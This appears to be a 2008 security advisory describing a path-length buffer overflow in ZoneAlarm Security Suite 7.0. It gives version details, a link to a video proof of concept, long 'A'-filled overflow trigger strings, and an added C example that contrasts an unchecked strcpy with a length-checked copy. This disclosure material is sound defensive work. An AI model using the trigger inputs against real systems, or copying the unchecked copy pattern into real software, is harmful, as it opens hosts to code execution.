securityvulns, SECURITYVULNS:DOC:20514
Sep 13, 2008 - 12:00 a.m.

ZoneAlarm Security Suite buffer overflow


Application: ZoneAlarm Security Suite
OS: Windows XP (all patches up to date)

1 - Description
2 - Vulnerability
3 - POC/EXPLOIT

Description

ZoneAlarm is a well-known firewall.
Its "Security Suite" edition also bundles tools such as antivirus, antispam and so on.

Details of the version

ZoneAlarm Security Suite versión:7.0.483.000
Versión de TrueVector:7.0.483.000
Versión del controlador:7.0.483.000
Versión de motor anti-virus:3
Versión de motor antivirus:5.0.1.85
Versión de archivo DAT de firma de anti-virus 915051681
Versión de motor de protección contra programas espía:5.0.189.0
Versión de archivo DAT de firma de protección contra programas espía 01.200801.3195
Versión de AntiSpam 5.0.6.8903


Vulnerability

The vulnerability arises because the program cannot handle very long paths when analyzing them.
This results in a buffer overflow, with the possibility of code execution.

The flaw could be exploited by malware, for instance, to leave the system without protection.
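
The advisory does not publish the affected code or its buffer size, so the following is an added illustration of the bug class it describes (an overlong path copied into a fixed buffer) next to a length-checked form; it is not ZoneAlarm code. The function names, the 260-byte buffer and the sample input are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF 260  /* assumption: Windows MAX_PATH; the advisory gives no size */

enum path_status { PATH_OK = 0, PATH_TOO_LONG = -1, PATH_INVALID = -2 };

/* Bug class, shown for contrast and never called: an unbounded copy of a
 * caller-supplied path writes past dst once src reaches PATH_BUF bytes. */
void normalize_unchecked(char dst[PATH_BUF], const char *src) { strcpy(dst, src); }

/* Hardened form: bound the read, then reject rather than truncate, so an
 * overlong path is reported instead of being handled under a different name. */
enum path_status normalize_checked(char *dst, size_t dst_len,
                                   const char *src, size_t src_max)
{
    const char *end;
    size_t n;
    if (dst == NULL || src == NULL || dst_len == 0)
        return PATH_INVALID;
    end = memchr(src, '\0', src_max);   /* never reads beyond src_max bytes */
    if (end == NULL)
        return PATH_INVALID;            /* no terminator inside the input */
    n = (size_t)(end - src);
    if (n >= dst_len)
        return PATH_TOO_LONG;           /* would not fit with its NUL */
    memcpy(dst, src, n + 1);
    return PATH_OK;
}

/* Constructed input: len 'A' bytes, the filler seen in the advisory's strings. */
enum path_status try_path_of_length(size_t len)
{
    static char src[4096];
    struct { char buf[PATH_BUF]; unsigned canary; } frame = { {0}, 0xC0FFEEu };
    enum path_status st;
    if (len >= sizeof src)
        return PATH_INVALID;
    memset(src, 'A', len);
    src[len] = '\0';
    st = normalize_checked(frame.buf, sizeof frame.buf, src, sizeof src);
    if (frame.canary != 0xC0FFEEu)      /* data next to the buffer was touched */
        return PATH_INVALID;
    return st;
}

int main(void)
{
    printf("259: %d, 260: %d, 600: %d\n", try_path_of_length(259),
           try_path_of_length(260), try_path_of_length(600));
    return 0;
}
```

Rejecting the overlong path, rather than truncating it, keeps a scanner from silently checking a different file name than the one it was handed.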


POC/EXPLOIT

A video proof of concept is available here:

http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf

Strings

ASCII: · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · · … AAAAAAAAAAAAAAAAAAA · …
AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · · … A · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA


ASCII:
……………………………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



Juan Pablo Lopez Yacubian